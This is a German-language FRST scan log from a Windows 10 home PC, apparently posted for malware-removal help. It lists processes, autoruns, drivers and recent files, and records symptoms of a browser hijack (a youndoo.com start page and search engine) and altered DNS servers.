ATTFilter Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 20-05-2017 durchgeführt von Dino (Administrator) auf **** (21-05-2017 21:24:07) Gestartet von C:\Users\Dino\Desktop Geladene Profile: Dino (Verfügbare Profile: Dino) Platform: Windows 10 Pro Version 1703 (X64) Sprache: Deutsch (Deutschland) Internet Explorer Version 11 (Standard-Browser: FF) Start-Modus: Normal Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Prozesse (Nicht auf der Ausnahmeliste) ================= (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.) (Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\vsserv.exe (AMD) C:\Windows\System32\atiesrxx.exe (AMD) C:\Windows\System32\atieclxx.exe () C:\Program Files (x86)\ASUS\AXSP\1.01.02\atkexComSvc.exe () C:\Windows\SysWOW64\ASGT.exe (ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AAHM\1.00.22\aaHMSvc.exe (Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe (ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AsusFanControlService\1.06.13\AsusFanControlService.exe (Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe (Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\updatesrv.exe (Bitdefender) C:\Program Files\Bitdefender Agent\ProductAgentService.exe (DEVGURU Co., LTD.) C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe (ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AI Suite III\AISuite3.exe () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe (ASUS) C:\Program Files (x86)\ASUS\GPU Tweak\Monitor.exe (Advanced Micro Devices, Inc.) 
C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe () C:\Program Files (x86)\ASUS\AI Suite III\AsusMiniBar.exe () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.15.597.0_x64__kzf8qxf38zg5c\SkypeHost.exe (Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe (Microsoft Corporation) C:\Program Files\Microsoft Xbox 360 Accessories\XBoxStat.exe (Spotify Ltd) C:\Users\Dino\AppData\Roaming\Spotify\SpotifyWebHelper.exe (Samsung) C:\Program Files (x86)\Samsung\Smart Switch PC\SmartSwitchPDLR.exe (CANON INC.) C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe (Geek Software GmbH) C:\Program Files (x86)\PDF24\pdf24.exe () C:\Program Files (x86)\Drakonia Configurator\hid.exe () C:\Program Files (x86)\Drakonia Configurator\trayicon.exe (Samsung Electronics.) C:\Program Files (x86)\Samsung\Samsung Magician\Samsung Magician.exe (Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\bdagent.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe (Hammer & Chisel, Inc.) C:\Users\Dino\AppData\Local\Discord\app-0.0.297\Discord.exe (Hammer & Chisel, Inc.) C:\Users\Dino\AppData\Local\Discord\app-0.0.297\Discord.exe (Hammer & Chisel, Inc.) C:\Users\Dino\AppData\Local\Discord\app-0.0.297\Discord.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe ==================== Registry (Nicht auf der Ausnahmeliste) ==================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.) 
HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [629152 2017-03-18] (Microsoft Corporation) HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8466136 2015-04-30] (Realtek Semiconductor) HKLM\...\Run: [XboxStat] => C:\Program Files\Microsoft Xbox 360 Accessories\XboxStat.exe [825184 2009-09-30] (Microsoft Corporation) HKLM-x32\...\Run: [IJNetworkScannerSelectorEX] => C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe [438888 2014-01-15] (CANON INC.) HKLM-x32\...\Run: [PDFPrint] => C:\Program Files (x86)\PDF24\pdf24.exe [210432 2016-07-05] (Geek Software GmbH) HKLM-x32\...\Run: [GamingMouse] => C:\Program Files (x86)\Drakonia Configurator\hid.exe [248832 2013-10-29] () HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\Run: [Spotify Web Helper] => C:\Users\Dino\AppData\Roaming\Spotify\SpotifyWebHelper.exe [1446000 2017-02-19] (Spotify Ltd) HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\Run: [SmartSwitchPDLR.exe] => C:\Program Files (x86)\Samsung\Smart Switch PC\SmartSwitchPDLR.exe [1037992 2017-02-07] (Samsung) HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\MountPoints2: {ab244902-eb0d-11e4-8257-806e6f6e6963} - "E:\autorun.exe" GroupPolicyScripts-x32: Beschränkung <======= ACHTUNG ==================== Internet (Nicht auf der Ausnahmeliste) ==================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.) 
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1 Tcpip\..\Interfaces\{06211c3c-22f5-4f8b-938a-39928700d64a}: [NameServer] 82.163.143.157 82.163.142.159 Tcpip\..\Interfaces\{06211c3c-22f5-4f8b-938a-39928700d64a}: [DhcpNameServer] 82.163.143.157 Tcpip\..\Interfaces\{142b5a4e-79e0-4f08-bda2-eaa2ab4e2034}: [NameServer] 82.163.143.157 82.163.142.159 Tcpip\..\Interfaces\{142b5a4e-79e0-4f08-bda2-eaa2ab4e2034}: [DhcpNameServer] 82.163.143.157 Tcpip\..\Interfaces\{ad8bd387-ecee-4a14-a4a7-473f0543f3ef}: [NameServer] 82.163.143.157 82.163.142.159 Tcpip\..\Interfaces\{ad8bd387-ecee-4a14-a4a7-473f0543f3ef}: [DhcpNameServer] 82.163.143.157 Tcpip\..\Interfaces\{be8f98fe-7eb3-471d-87c5-3d35bdb361e0}: [NameServer] 82.163.143.157 82.163.142.159 Tcpip\..\Interfaces\{be8f98fe-7eb3-471d-87c5-3d35bdb361e0}: [DhcpNameServer] 192.168.0.1 Internet Explorer: ================== HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://google.de/ BHO: Bitdefender-Geldbörse -> {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} -> C:\Program Files\Bitdefender\Bitdefender 2017\pmbxie.dll [2017-04-24] (Bitdefender) BHO: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files\Canon\Easy-WebPrint EX\ewpexbho.dll [2014-07-07] (CANON INC.) BHO: Ghostery Plugin -> {6BF739DD-3323-4C6A-975B-C7E00A50B154} -> C:\Program Files (x86)\Ghostery\bin\ghostery64.dll [2015-01-23] (Ghostery, Inc.) 
BHO: Adblock Plus for IE Browser Helper Object -> {FFCB3198-32F3-4E8B-9539-4324694ED664} -> C:\Program Files\Adblock Plus for IE\AdblockPlus64.dll [2015-02-25] (Eyeo GmbH) BHO-x32: Bitdefender-Geldbörse -> {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} -> C:\Program Files\Bitdefender\Bitdefender 2017\Antispam32\pmbxie.dll [2017-04-24] (Bitdefender) BHO-x32: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexbho.dll [2014-07-07] (CANON INC.) BHO-x32: Ghostery Plugin -> {6BF739DD-3323-4C6A-975B-C7E00A50B154} -> C:\Program Files (x86)\Ghostery\bin\ghostery.dll [2015-01-23] (Ghostery, Inc.) BHO-x32: Adblock Plus for IE Browser Helper Object -> {FFCB3198-32F3-4E8B-9539-4324694ED664} -> C:\Program Files\Adblock Plus for IE\AdblockPlus32.dll [2015-02-25] (Eyeo GmbH) Toolbar: HKLM - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files\Canon\Easy-WebPrint EX\ewpexhlp.dll [2014-07-07] (CANON INC.) Toolbar: HKLM - Bitdefender-Geldbörse - {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} - C:\Program Files\Bitdefender\Bitdefender 2017\pmbxie.dll [2017-04-24] (Bitdefender) Toolbar: HKLM-x32 - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexhlp.dll [2014-07-07] (CANON INC.) 
Toolbar: HKLM-x32 - Bitdefender-Geldbörse - {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} - C:\Program Files\Bitdefender\Bitdefender 2017\Antispam32\pmbxie.dll [2017-04-24] (Bitdefender) FireFox: ======== FF ProfilePath: C:\Users\Dino\AppData\Roaming\Mozilla\Firefox\Profiles\rcgkbgt3.default-1489247668614 [2017-05-21] FF Homepage: Mozilla\Firefox\Profiles\rcgkbgt3.default-1489247668614 -> google.de/ FF HKLM\...\Firefox\Extensions: [bdwteffv20@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2017\antispam32\bdwteff FF Extension: (Bitdefender Wallet) - C:\Program Files\Bitdefender\Bitdefender 2017\antispam32\bdwteff [2017-05-01] FF HKLM\...\Thunderbird\Extensions: [bdThunderbird@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2017\bdtbext FF Extension: (Bitdefender Antispam Toolbar) - C:\Program Files\Bitdefender\Bitdefender 2017\bdtbext [2017-01-19] [ist nicht signiert] FF HKLM-x32\...\Firefox\Extensions: [bdwteffv20@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2017\antispam32\bdwteff FF HKLM-x32\...\Thunderbird\Extensions: [bdThunderbird@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2017\bdtbext FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_25_0_0_171.dll [2017-05-12] () FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_25_0_0_171.dll [2017-05-12] () FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-09-16] (Intel Corporation) FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-09-16] (Intel Corporation) FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-05-01] (Google Inc.) 
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-05-01] (Google Inc.) Chrome: ======= CHR DefaultProfile: ChromeDefaultData CHR HomePage: ChromeDefaultData -> hxxp://www.youndoo.com/?z=29cb5008ab1dbbc7820f6fbg3z6b7q2c9gde0o1b9q&from=wak&uid=SamsungXSSDX850XPROX256GB_S251NSAG301960E&type=hp CHR StartupUrls: ChromeDefaultData -> "hxxp://www.youndoo.com/?z=29cb5008ab1dbbc7820f6fbg3z6b7q2c9gde0o1b9q&from=wak&uid=SamsungXSSDX850XPROX256GB_S251NSAG301960E&type=hp" CHR DefaultSearchURL: ChromeDefaultData -> hxxp://www.youndoo.com/search/?q={searchTerms}&z=29cb5008ab1dbbc7820f6fbg3z6b7q2c9gde0o1b9q&from=wak&uid=SamsungXSSDX850XPROX256GB_S251NSAG301960E&type=sp CHR DefaultSearchKeyword: ChromeDefaultData -> youndoo CHR Profile: C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData [2017-02-05] <==== ACHTUNG CHR Extension: (Google Präsentationen) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-11-22] CHR Extension: (Google Docs) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\aohghmighlieiainnegkcijnfilokake [2015-11-22] CHR Extension: (Google Drive) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-11-22] CHR Extension: (YouTube) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-11-22] CHR Extension: (Google-Suche) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-11-22] CHR Extension: (Google Tabellen) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-11-22] CHR Extension: (Google Docs Offline) - C:\Users\Dino\AppData\Local\Google\Chrome\User 
Data\ChromeDefaultData\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-11-22] CHR Extension: (CrowdBar) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\lhinknkceoifkecnmmlgnelmdipmbcdn [2015-11-22] CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-11-22] CHR Extension: (Google Mail) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-11-22] CHR HKLM-x32\...\Chrome\Extension: [gannpgaobkkhmpomoijebaigcapoeebl] - hxxps://clients2.google.com/service/update2/crx ==================== Dienste (Nicht auf der Ausnahmeliste) ==================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) R2 asComSvc; C:\Program Files (x86)\ASUS\AXSP\1.01.02\atkexComSvc.exe [936728 2013-07-04] () R2 ASGT; C:\Windows\SysWOW64\ASGT.exe [55296 2012-01-17] () [Datei ist nicht signiert] R2 asHmComSvc; C:\Program Files (x86)\ASUS\AAHM\1.00.22\aaHMSvc.exe [954648 2014-09-09] (ASUSTeK Computer Inc.) R2 AsusFanControlService; C:\Program Files (x86)\ASUS\AsusFanControlService\1.06.13\AsusFanControlService.exe [384000 2014-10-11] (ASUSTeK Computer Inc.) 
[Datei ist nicht signiert] S3 EasyAntiCheat; C:\WINDOWS\SysWOW64\EasyAntiCheat.exe [409128 2017-02-23] (EasyAntiCheat Ltd) S3 ElfoService; D:\Programme\ElsterFormular Update Service\bin\ElfoService.exe [1283304 2017-03-20] () R2 Intel(R) Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel(R) Corporation) [Datei ist nicht signiert] S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel(R) Corporation) R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [169432 2013-09-16] (Intel Corporation) S3 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [2007048 2015-08-22] (Electronic Arts) R2 ProductAgentService; C:\Program Files\Bitdefender Agent\ProductAgentService.exe [1230824 2017-02-22] (Bitdefender) S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [3913064 2017-03-20] (Microsoft Corporation) R2 ss_conn_service; C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe [754784 2016-07-22] (DEVGURU Co., LTD.) R2 UPDATESRV; C:\Program Files\Bitdefender\Bitdefender 2017\updatesrv.exe [218416 2017-04-24] (Bitdefender) R2 VSSERV; C:\Program Files\Bitdefender\Bitdefender 2017\vsserv.exe [1424224 2017-05-02] (Bitdefender) R2 vsservp; C:\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe [524872 2016-08-25] (Bitdefender) S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [342264 2017-03-18] (Microsoft Corporation) S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [102816 2017-03-18] (Microsoft Corporation) ===================== Treiber (Nicht auf der Ausnahmeliste) ====================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) 
R2 amdacpksd; C:\WINDOWS\system32\drivers\amdacpksd.sys [305392 2016-04-05] (Advanced Micro Devices) S0 amdkmafd; C:\WINDOWS\System32\drivers\amdkmafd.sys [49448 2016-08-18] (Advanced Micro Devices, Inc.) R3 amdkmdag; C:\WINDOWS\System32\DriverStore\FileRepository\c0313676.inf_amd64_96bbc33bec5c7fae\atikmdag.sys [36558208 2017-05-16] (Advanced Micro Devices, Inc.) R3 amdkmdap; C:\WINDOWS\System32\DriverStore\FileRepository\c0313676.inf_amd64_96bbc33bec5c7fae\atikmpag.sys [528760 2017-05-16] (Advanced Micro Devices, Inc.) R1 AsIO; C:\Windows\SysWow64\drivers\AsIO.sys [15232 2013-07-04] () R3 AtiHDAudioService; C:\WINDOWS\system32\drivers\AtihdWT6.sys [110088 2017-03-31] (Advanced Micro Devices) R0 avc3; C:\WINDOWS\System32\DRIVERS\avc3.sys [1605376 2016-09-20] (BitDefender) R3 avckf; C:\WINDOWS\System32\DRIVERS\avckf.sys [878072 2016-09-20] (BitDefender) S0 bdelam; C:\WINDOWS\System32\drivers\bdelam.sys [23672 2016-03-14] (Bitdefender) R1 bdfwfpf; C:\Program Files\Common Files\Bitdefender\Bitdefender Firewall\bdfwfpf.sys [128400 2016-06-24] (BitDefender LLC) R1 BDVEDISK; C:\WINDOWS\system32\DRIVERS\bdvedisk.sys [87912 2015-12-04] (BitDefender) S3 dg_ssudbus; C:\WINDOWS\system32\DRIVERS\ssudbus.sys [131712 2016-09-05] (Samsung Electronics Co., Ltd.) R0 gzflt; C:\WINDOWS\System32\DRIVERS\gzflt.sys [182944 2016-10-29] (BitDefender LLC) R0 ignis; C:\WINDOWS\system32\DRIVERS\ignis.sys [305120 2017-03-20] (Bitdefender) R3 IOMap; C:\WINDOWS\system32\drivers\IOMap64.sys [24824 2014-10-23] (ASUSTeK Computer Inc.) R3 MEIx64; C:\WINDOWS\system32\DRIVERS\TeeDriverx64.sys [99288 2013-09-16] (Intel Corporation) R1 NNSALPC; C:\WINDOWS\system32\DRIVERS\NNSALPC.sys [103824 2015-07-17] (Panda Security, S.L.) R1 NNSHTTP; C:\WINDOWS\system32\DRIVERS\NNSHTTP.sys [211352 2015-07-17] (Panda Security, S.L.) R1 NNSHTTPS; C:\WINDOWS\system32\DRIVERS\NNSHTTPS.sys [120216 2015-07-17] (Panda Security, S.L.) 
R1 NNSIDS; C:\WINDOWS\system32\DRIVERS\NNSIDS.sys [120208 2015-07-17] (Panda Security, S.L.) R1 NNSNAHSL; C:\WINDOWS\system32\DRIVERS\NNSNAHSL.sys [58616 2015-06-19] (Panda Security, S.L.) R1 NNSPICC; C:\WINDOWS\system32\DRIVERS\NNSPICC.sys [112536 2015-07-17] (Panda Security, S.L.) R1 NNSPIHSW; C:\WINDOWS\system32\DRIVERS\NNSPIHSW.sys [89472 2015-09-01] (Panda Security, S.L.) R1 NNSPOP3; C:\WINDOWS\system32\DRIVERS\NNSPOP3.sys [133528 2015-07-17] (Panda Security, S.L.) R1 NNSPROT; C:\WINDOWS\system32\DRIVERS\NNSPROT.sys [309648 2015-07-17] (Panda Security, S.L.) R1 NNSPRV; C:\WINDOWS\system32\DRIVERS\NNSPRV.sys [179608 2015-07-17] (Panda Security, S.L.) R1 NNSSMTP; C:\WINDOWS\system32\DRIVERS\NNSSMTP.sys [122776 2015-07-17] (Panda Security, S.L.) R1 NNSSTRM; C:\WINDOWS\system32\DRIVERS\NNSSTRM.sys [267160 2015-07-17] (Panda Security, S.L.) R1 NNSTLSC; C:\WINDOWS\system32\DRIVERS\NNSTLSC.sys [115600 2015-07-17] (Panda Security, S.L.) R2 PSINAflt; C:\WINDOWS\System32\DRIVERS\PSINAflt.sys [173464 2015-07-22] (Panda Security, S.L.) R2 PSINFile; C:\WINDOWS\System32\DRIVERS\PSINFile.sys [130968 2015-07-22] (Panda Security, S.L.) R1 PSINKNC; C:\WINDOWS\system32\DRIVERS\PSINKNC.sys [207256 2015-07-22] (Panda Security, S.L.) R2 PSINProc; C:\WINDOWS\System32\DRIVERS\PSINProc.sys [133528 2015-07-22] (Panda Security, S.L.) R2 PSINProt; C:\WINDOWS\System32\DRIVERS\PSINProt.sys [143768 2015-07-22] (Panda Security, S.L.) R2 PSINReg; C:\WINDOWS\system32\DRIVERS\PSINReg.sys [117144 2015-07-22] (Panda Security, S.L.) S3 PSKMAD; C:\WINDOWS\System32\DRIVERS\PSKMAD.sys [62080 2015-06-16] (Panda Security, S.L.) R3 ScpVBus; C:\WINDOWS\System32\drivers\ScpVBus.sys [39168 2013-05-05] (Scarlet.Crush Productions) S3 SDFRd; C:\WINDOWS\System32\drivers\SDFRd.sys [31128 2017-03-18] () S3 ssudmdm; C:\WINDOWS\system32\DRIVERS\ssudmdm.sys [165504 2016-09-05] (Samsung Electronics Co., Ltd.) R0 trufos; C:\WINDOWS\System32\DRIVERS\trufos.sys [520032 2016-06-22] (BitDefender S.R.L.) 
S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [44632 2017-03-18] (Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [294816 2017-03-18] (Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [121248 2017-03-18] (Microsoft Corporation)
S2 RtNdPt630; \SystemRoot\system32\DRIVERS\RtNdPt630.sys [X]
S3 RTTEAMPT; \SystemRoot\system32\DRIVERS\RtTeam620.sys [X]
S3 RTVLANPT; \SystemRoot\system32\DRIVERS\RtVlan620.sys [X]

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

==================== Ein Monat: Erstellte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2017-05-21 21:24 - 2017-05-21 21:24 - 00020202 _____ C:\Users\Dino\Desktop\FRST.txt
2017-05-21 21:23 - 2017-05-21 21:24 - 00005376 _____ C:\TDSSKiller.3.1.0.15_21.05.2017_21.23.57_log.txt
2017-05-21 21:19 - 2017-05-21 21:04 - 02429952 _____ (Farbar) C:\Users\Dino\Desktop\FRST64.exe
2017-05-21 21:19 - 2017-05-21 20:48 - 04922400 _____ (AO Kaspersky Lab) C:\Users\Dino\Desktop\tdsskiller.exe
2017-05-21 21:00 - 2017-05-21 21:19 - 00285358 _____ C:\TDSSKiller.3.1.0.15_21.05.2017_21.00.59_log.txt
2017-05-21 20:56 - 2017-05-21 20:56 - 00000000 ___HD C:\OneDriveTemp
2017-05-21 20:51 - 2017-05-21 20:51 - 00000492 _____ C:\TDSSKiller.3.1.0.15_21.05.2017_20.51.38_log.txt
2017-05-19 14:28 - 2017-05-21 21:24 - 00000000 ____D C:\FRST
2017-05-17 21:18 - 2017-05-17 21:18 - 00003160 _____ C:\WINDOWS\System32\Tasks\StartCN
2017-05-17 21:18 - 2017-05-17 21:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Settings
2017-05-16 18:06 - 2017-05-16 18:06 - 00121208 _____ (Khronos Group) C:\WINDOWS\system32\OpenCL.dll
2017-05-16 18:06 - 2017-05-16 18:06 - 00112000 _____ (Khronos Group) C:\WINDOWS\SysWOW64\OpenCL.dll
2017-05-16 18:06 - 2017-05-16 18:06 - 00029056 _____ (Microsoft Corporation) C:\WINDOWS\system32\detoured.dll
2017-05-16 18:06 - 2017-05-16 18:06 - 00029048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\detoured.dll
2017-05-09 21:39 - 2017-04-28 03:38 - 01411128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll
2017-05-09 21:39 - 2017-04-28 03:19 - 01839872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2017-05-09 21:39 - 2017-04-28 03:19 - 00605936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleaut32.dll
2017-05-09 21:39 - 2017-04-28 03:18 - 02259760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreUIComponents.dll
2017-05-09 21:39 - 2017-04-28 03:16 - 00599576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kernel32.dll
2017-05-09 21:39 - 2017-04-28 03:12 - 01604312 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32full.dll
2017-05-09 21:39 - 2017-04-28 03:12 - 00543640 _____ (Microsoft Corporation) C:\WINDOWS\system32\securekernel.exe
2017-05-09 21:39 - 2017-04-28 03:11 - 02158544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2017-05-09 21:39 - 2017-04-28 03:09 - 01557288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\crypt32.dll
2017-05-09 21:39 - 2017-04-28 03:08 - 08320920 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2017-05-09 21:39 - 2017-04-28 03:08 - 02399728 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2017-05-09 21:39 - 2017-04-28 03:08 - 02330520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2017-05-09 21:39 - 2017-04-28 03:08 - 00775824 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleaut32.dll
2017-05-09 21:39 - 2017-04-28 03:07 - 06759512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2017-05-09 21:39 - 2017-04-28 03:07 - 00988168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll
2017-05-09 21:39 - 2017-04-28 03:06 - 02969880 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreUIComponents.dll
2017-05-09 21:39 - 2017-04-28 03:06 - 00708712 _____ (Microsoft Corporation) C:\WINDOWS\system32\kernel32.dll
2017-05-09 21:39 - 2017-04-28 03:05 - 00923040 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll
2017-05-09 21:39 - 2017-04-28 03:04 - 00583160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreMessaging.dll
2017-05-09 21:39 - 2017-04-28 03:03 - 00667040 _____ (Microsoft Corporation) C:\WINDOWS\system32\ci.dll
2017-05-09 21:39 - 2017-04-28 03:00 - 02444192 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2017-05-09 21:39 - 2017-04-28 02:59 - 05477088 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneCoreUAPCommonProxyStub.dll
2017-05-09 21:39 - 2017-04-28 02:59 - 02635336 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2017-05-09 21:39 - 2017-04-28 02:59 - 00388000 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBXHCI.SYS
2017-05-09 21:39 - 2017-04-28 02:59 - 00207264 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll
2017-05-09 21:39 - 2017-04-28 02:59 - 00027040 _____ (Microsoft Corporation) C:\WINDOWS\system32\browser_broker.exe
2017-05-09 21:39 - 2017-04-28 02:58 - 01852776 _____ (Microsoft Corporation) C:\WINDOWS\system32\crypt32.dll
2017-05-09 21:39 - 2017-04-28 02:58 - 00872472 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipSVC.dll
2017-05-09 21:39 - 2017-04-28 02:57 - 03116184 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
2017-05-09 21:39 - 2017-04-28 02:56 - 07904784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2017-05-09 21:39 - 2017-04-28 02:55 - 21353200 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2017-05-09 21:39 - 2017-04-28 02:55 - 01325456 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2017-05-09 21:39 - 2017-04-28 02:53 - 00387928 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpps.dll
2017-05-09 21:39 - 2017-04-28 02:52 - 02957824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
